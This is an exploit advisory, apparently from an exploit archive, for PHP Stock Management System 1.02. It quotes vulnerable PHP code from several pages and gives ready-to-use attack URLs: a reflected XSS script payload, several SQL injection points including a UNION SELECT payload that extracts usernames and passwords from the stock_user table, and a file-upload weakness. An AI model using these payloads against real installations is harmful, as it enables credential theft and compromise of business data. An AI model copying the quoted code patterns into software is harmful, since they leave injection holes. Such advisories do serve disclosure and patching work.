# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty # Date : 9-9-2014 # Author : jsass &#8203;# Vendor Homepage: &#8203;http://www.posnic.com/&#8203; # Software Link:&#8203; http://sourceforge.net/projects/stockmanagement/ # Version: &#8203;1.02 # Tested on: kali linux # Twitter : @KwSecurity # Group : Q8 GRAY HAT TEAM ########################################### XSS install.php code : if(isset($_REQUEST['msg'])) { $msg=$_REQUEST['msg']; echo "<p style=color:red>$msg</p>"; } exploit : http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E ################################################################ SQL INJECTION : stock.php code : include_once("init.php"); $q = strtolower($_GET["q"]); if (!$q) return; $db->query("SELECT * FROM stock_avail where quantity >0 "); while ($line = $db->fetchNextObject()) { if (strpos(strtolower($line->name), $q) !== false) { echo "$line->name\n"; } } exploit : localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject) ############################################################## SQL INJECTION : view_customers.php code : $SQL = "SELECT * FROM customer_details"; if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="") { $SQL = "SELECT * FROM customer_details WHERE customer_name LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'"; } exploit : http://localhost/demo/POSNIC1.02DesignFix/view_customers.php POST searchtxt=1(inject)&Search=Search searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search ############################################# SQL INJECTION : view_product.php code : if(isset($_GET['limit']) && is_numeric($_GET['limit'])){ $limit=$_GET['limit']; $_GET['limit']=10; } $page = $_GET['page']; if($page) $start = ($page - 1) * $limit; //first item to display on this page else $start = 0; //if no page var is given, set start to 0 /* Get data. */ $sql = "SELECT * FROM stock_details LIMIT $start, $limit "; if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="") { $sql= "SELECT * FROM stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%' LIMIT $start, $limit"; } $result = mysql_query($sql); exploit : localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject) and localhost/demo/POSNIC1.02DesignFix/view_product.php post searchtxt=a(inject)&Search=Search ######################################################## UPLOAD : logo_set.php code : <?php if(isset($_POST['submit'])){ $allowedExts = array("gif", "jpeg", "jpg", "png"); $temp = explode(".", $_FILES["file"]["name"]); $extension = end($temp); if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/png")) && ($_FILES["file"]["size"] < 20000) && in_array($extension, $allowedExts)) { if ($_FILES["file"]["error"] > 0) { echo "Return Code: " . $_FILES["file"]["error"] . "<br>"; } else { $upload= $_FILES["file"]["name"] ; $type=$_FILES["file"]["type"]; exploit : http://localhost/demo/POSNIC1.02DesignFix/logo_set.php ################################################# AND MORE BUGS Bye ################################################## Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight sec4ever.com & alm3refh.com ##################################################